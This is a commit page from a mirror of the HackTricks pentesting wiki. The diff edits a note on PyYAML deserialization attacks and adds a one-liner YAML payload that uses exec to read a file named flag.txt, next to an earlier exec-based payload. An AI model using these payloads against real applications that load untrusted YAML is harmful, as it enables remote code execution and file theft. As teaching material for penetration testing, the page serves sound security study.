Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3023] No subject

Browse source
This commit is contained in:
CPol 2022-02-18 18:14:38 +00:00 committed by gitbook-bot
parent aae67966bf
commit d7e70413dc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 7 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
pentesting-web/deserialization/python-yaml-deserialization.md
View file

@ -72,7 +72,7 @@ print(yaml.unsafe_load_all(data))
**Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)`
You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**. The proposed exploit in that page is:**
You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is:
```yaml
!!python/object/new:str
@ -83,6 +83,12 @@ state: !!python/tuple
update: !!python/name:exec
```
Or you could also use this **one-liner provided by @ishaack**:
```yaml
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
```
Note that in **recent versions** you cannot **no longer call `.load()`** **without a `Loader`** and the **`FullLoader`** is **no longer vulnerable** to that attack.
## RCE